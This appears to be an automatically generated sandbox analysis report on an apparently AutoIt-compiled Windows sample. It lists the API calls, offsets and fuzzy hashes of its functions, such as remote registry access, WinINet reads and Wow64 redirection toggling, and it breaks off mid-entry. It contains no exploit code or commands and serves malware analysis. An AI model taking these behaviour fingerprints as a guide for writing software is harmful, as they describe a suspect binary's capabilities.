                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
                                                • Instruction ID: 692752c2c850a5c8ed03e6f098b84b58c0440c771ae0dc7cf6b7e5924add74c1
                                                • Opcode Fuzzy Hash: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
                                                • Instruction Fuzzy Hash: CDF03C34A40209ABDB119B94DC49BAEBFE5FB54751F0001A5E806A62A0CB70A944DE90
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
                                                • FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 145871493-3689287502
                                                • Opcode ID: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
                                                • Instruction ID: 16283ffd9647496279248e6936e60fcdeb8308ace92cc0f5365f1196ffeef1e6
                                                • Opcode Fuzzy Hash: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
                                                • Instruction Fuzzy Hash: 54E08635B016225BE33117257C18B9F7E58BF93B627050215FC04D2200DB60CD4598A2
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
                                                • FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Library$AddressFreeLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 145871493-1355242751
                                                • Opcode ID: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
                                                • Instruction ID: c00cc8ec08d002cd9b4a5957fddf67c7e2e60ced3bcc97b4d2ec27bf5b7f19f1
                                                • Opcode Fuzzy Hash: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
                                                • Instruction Fuzzy Hash: 17D0123560262257A7321B257C18DCF7E1CBF87B513050715F905A6214DF61CD46D9E1
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 0059A427
                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0059A435
                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0059A468
                                                • CloseHandle.KERNEL32(?), ref: 0059A63D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                • String ID:
                                                • API String ID: 3488606520-0
                                                • Opcode ID: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
                                                • Instruction ID: a1d191c2bac256b3c28d0f258f2a557af3329cf0ad95e8c8a8494c0d65edd18f
                                                • Opcode Fuzzy Hash: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
                                                • Instruction Fuzzy Hash: BCA160716043019FEB20DF24D88AB2ABBE5BF84714F14885DF55A9B3D2DB71EC418B92
                                                APIs
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
                                                • _free.LIBCMT ref: 0054BB7F
                                                  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                • _free.LIBCMT ref: 0054BD4B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                • String ID:
                                                • API String ID: 1286116820-0
                                                • Opcode ID: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
                                                • Instruction ID: 6458ec65f0ef44d81316055b1b86e12903526851099121acaf2fa9c6b05f6472
                                                • Opcode Fuzzy Hash: 017de7a3d97c3c82398593e4bc13c1b7bb4e02e70dfa46924d1dc0338f07028f
                                                • Instruction Fuzzy Hash: D951E47190020AABEB14EF669CC59EEBFB8FB90318B10066AE554D7291EB30DE459B50
                                                APIs
                                                  • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0057CF22,?), ref: 0057DDFD
                                                  • Part of subcall function 0057DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0057CF22,?), ref: 0057DE16
                                                  • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0057E473
                                                • MoveFileW.KERNEL32(?,?), ref: 0057E4AC
                                                • _wcslen.LIBCMT ref: 0057E5EB
                                                • _wcslen.LIBCMT ref: 0057E603
                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0057E650
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                • String ID:
                                                • API String ID: 3183298772-0
                                                • Opcode ID: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
                                                • Instruction ID: f7b32ffa0406c7e72e17dbb538541a1960531860fa7a35bfe44debbd196d8cad
                                                • Opcode Fuzzy Hash: 1ca2ea8168c41e3a96d73ee7f9078b7d37f065beb2141432717f693e3f3fbaa5
                                                • Instruction Fuzzy Hash: 125192B24083455BC724DB90E8969DF7BECBFC8340F00492EF689D3151EF75A6889766
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                  • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059BAA5
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059BB00
                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0059BB63
                                                • RegCloseKey.ADVAPI32(?,?), ref: 0059BBA6
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0059BBB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                • String ID:
                                                • API String ID: 826366716-0
                                                • Opcode ID: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
                                                • Instruction ID: cdc935dd82569dc0e844e059fad9d4eec726ddd56382caa8f3be6678c7951da6
                                                • Opcode Fuzzy Hash: ab358ccb64121e4d00b320407a521ea787e4b4bf072dc6102dfda4396054a205
                                                • Instruction Fuzzy Hash: 8661B031208241AFE714DF24C594E6ABFE5FF84308F14895CF49A8B2A2DB31ED45CB92
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 00578BCD
                                                • VariantClear.OLEAUT32 ref: 00578C3E
                                                • VariantClear.OLEAUT32 ref: 00578C9D
                                                • VariantClear.OLEAUT32(?), ref: 00578D10
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00578D3B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$ChangeInitType
                                                • String ID:
                                                • API String ID: 4136290138-0
                                                • Opcode ID: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
                                                • Instruction ID: 7c80970e1213464221eb4496de8c75ebeb80294f245bfc2cd8b3f89fe0b275e7
                                                • Opcode Fuzzy Hash: 281ad127c6f5b488f41dd9095753c0cfa24943926c3d3f92b3153a99f55794ce
                                                • Instruction Fuzzy Hash: 415159B5A00219EFCB14CF68D894AAABBF8FF8D310B158559E909DB350E730E911CF90
                                                APIs
                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00588BAE
                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00588BDA
                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00588C32
                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00588C57
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00588C5F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$SectionWrite$String
                                                • String ID:
                                                • API String ID: 2832842796-0
                                                • Opcode ID: 87179ad2596f35eb8dcdeeee76adf1c38219a675df665b1847acd0d0e42de642
                                                • Instruction ID: a19e350f6f286658c5e9b15f55307042e586999b4f5f3ad6ce430dbebeefcec4
                                                • Opcode Fuzzy Hash: 87179ad2596f35eb8dcdeeee76adf1c38219a675df665b1847acd0d0e42de642
                                                • Instruction Fuzzy Hash: 3D514C35A002199FDB05EF64C885AA9BFF5FF89314F098458E849AB362DB31ED51CB90
                                                APIs
                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00598F40
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00598FD0
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00598FEC
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00599032
                                                • FreeLibrary.KERNEL32(00000000), ref: 00599052
                                                  • Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00581043,?,7529E610), ref: 0052F6E6
                                                  • Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0056FA64,00000000,00000000,?,?,00581043,?,7529E610,?,0056FA64), ref: 0052F70D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                • String ID:
                                                • API String ID: 666041331-0
                                                • Opcode ID: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
                                                • Instruction ID: fbbef9e352b1613c8fa91f9117b92fae8a2c555a3f6b240144b2c7ccdc133f01
                                                • Opcode Fuzzy Hash: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
                                                • Instruction Fuzzy Hash: F9511735600205DFDB11DF58C4988A9BFF1FF8A314F0980A8E81A9B362DB31ED85CB90
                                                APIs
                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 005A6C33
                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 005A6C4A
                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005A6C73
                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0058AB79,00000000,00000000), ref: 005A6C98
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005A6CC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Long$MessageSendShow
                                                • String ID:
                                                • API String ID: 3688381893-0
                                                • Opcode ID: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
                                                • Instruction ID: 3b39315b6169eefebab93b79cc03f7a843ee7e4f72620e3c0e304cce5329afcd
                                                • Opcode Fuzzy Hash: 0e697621d9952cc67840213a7c0c9299afe9c12277914fe7d495b2076fc54496
                                                • Instruction Fuzzy Hash: CF418035A04104AFD724DF28CC68BAD7FA5FB0B360F190268F995AB2A1C771AD41DA50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
                                                • Instruction ID: 183b748e96f74ac567f286ee50b1371f51938626959f1d6d97846b07228f91e5
                                                • Opcode Fuzzy Hash: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
                                                • Instruction Fuzzy Hash: 5E41E432A002109FCB24DF78C884A9EBBF5FF89318F554569F515EB396D631AD01DB80
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 00529141
                                                • ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                • GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                • GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AsyncState$ClientCursorScreen
                                                • String ID:
                                                • API String ID: 4210589936-0
                                                • Opcode ID: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
                                                • Instruction ID: 9d2a1fbd3cd9d4703fec7a0be231ebe00589e17911c06a0eb440ed85d9f8d19a
                                                • Opcode Fuzzy Hash: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
                                                • Instruction Fuzzy Hash: 1D415F7190861BBBDF159F69D848BEEBB74FF4A324F20421AE425A32D0C7305D54DB91
                                                APIs
                                                • GetInputState.USER32 ref: 005838CB
                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00583922
                                                • TranslateMessage.USER32(?), ref: 0058394B
                                                • DispatchMessageW.USER32(?), ref: 00583955
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                • String ID:
                                                • API String ID: 2256411358-0
                                                • Opcode ID: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
                                                • Instruction ID: 4f7c704a049fd1d16365d79e5dc282e96174174b464351dbbf9ba9575ee632fa
                                                • Opcode Fuzzy Hash: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
                                                • Instruction Fuzzy Hash: 5931EB709057819EEB39EF34D849BB63FA8FB15700F04056DECA6E60A0E7F49689DB11
                                                APIs
                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CF38
                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 0058CF6F
                                                • GetLastError.KERNEL32(?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFB4
                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFC8
                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFF2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                • String ID:
                                                • API String ID: 3191363074-0
                                                • Opcode ID: cd7a6e7c983613b9baafcb138b53a459a5673fa5fc532f949d85694e21ad5de5
                                                • Instruction ID: 8ef22b1384aa3925981837eb9b4bbcd1e2dfa31eb94be813000d1238b4842efa
                                                • Opcode Fuzzy Hash: cd7a6e7c983613b9baafcb138b53a459a5673fa5fc532f949d85694e21ad5de5
                                                • Instruction Fuzzy Hash: 55314C71604205AFEB20EFA5D884AABBFF9FF15354B10442EFA06E2141DB30AE44DB70
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00571915
                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 005719C1
                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 005719C9
                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 005719DA
                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 005719E2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessagePostSleep$RectWindow
                                                • String ID:
                                                • API String ID: 3382505437-0
                                                • Opcode ID: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
                                                • Instruction ID: 3486ec42c9f545e93dc0979e5a5cae22f7656c2c3d0fa965b371baba725cc6ab
